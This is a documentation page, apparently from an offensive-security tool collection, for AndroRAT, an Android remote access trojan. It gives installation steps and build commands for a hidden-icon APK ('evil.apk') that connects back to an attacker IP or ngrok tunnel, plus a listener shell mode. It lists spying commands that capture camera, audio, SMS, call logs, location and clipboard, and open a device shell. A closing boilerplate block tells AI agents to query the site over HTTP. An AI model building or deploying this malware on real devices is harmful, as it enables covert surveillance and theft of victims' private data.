# AndroRAT

### Installation : 

```
git clone https://github.com/karma9874/AndroRAT.git
cd AndroRAT
pip install -r requirements.txt
```

#### Available Modes

* `--build` - for building the android apk
* `--ngrok` - for using ngrok tunnel (over the internet)
* `--shell` - getting an interactive shell of the device

### Build Mode : 

```
Usage:
  python3 androRAT.py --build --ngrok [flags]
  Flags:
  -p, --port        Attacker port number (optional by default its set to 8000)
  -o, --output      Name for the apk file (optional by default its set to "karma.apk")
  -icon, --icon     Visible icon after installing apk (by default set to hidden)
```

```
Usage:
  python3 androRAT.py --build [flags]
  Flags:
    -i, --ip              Attacker IP address (required)
    -p, --port            Attacker port number (required)
    -o, --output          Name for the apk file (optional)
    -icon, --icon         Visible icon after installing apk (by default set to hidden)
```

### Shell Mode : 

```
Usage:
  python3 androRAT.py --shell [flags]
  Flags:
    -i, --ip                Listner IP address
    -p, --port              Listner port number
```

### Commands Available 

```
    deviceInfo                 --> returns basic info of the device
    camList                    --> returns cameraID  
    takepic [cameraID]         --> Takes picture from camera
    startVideo [cameraID]      --> starts recording the video
    stopVideo                  --> stop recording the video and return the video file
    startAudio                 --> starts recording the audio
    stopAudio                  --> stop recording the audio
    getSMS [inbox|sent]        --> returns inbox sms or sent sms in a file 
    getCallLogs                --> returns call logs in a file
    shell                      --> starts a sh shell of the device
    vibrate [number_of_times]  --> vibrate the device number of time
    getLocation                --> return the current location of the device
    getIP                      --> returns the ip of the device
    getSimDetails              --> returns the details of all sim of the device
    clear                      --> clears the screen
    getClipData                --> return the current saved text from the clipboard
    getMACAddress              --> returns the mac address of the device
    exit                       --> exit the interpreter
```

### Usage : 

* To build the apk using ngrok which will also set the listner: `python3 androRAT.py --build --ngrok -o evil.apk`
* To build the apk using desired ip and port: `python3 androRAT.py --build -i 192.169.x.x -p 8000 -o evil.apk`
* To get the interpreter: `python3 androRAT.py --shell -i 0.0.0.0 -p 8000`

<figure><img src="/files/y3kLDsYycEfSmRdMiUmP" alt=""><figcaption></figcaption></figure>

<figure><img src="/files/xwIMc310Fl134jXAQeNO" alt=""><figcaption></figcaption></figure>


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://ghoulsec.gitbook.io/Toolbase/mobile-attacks/androrat.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.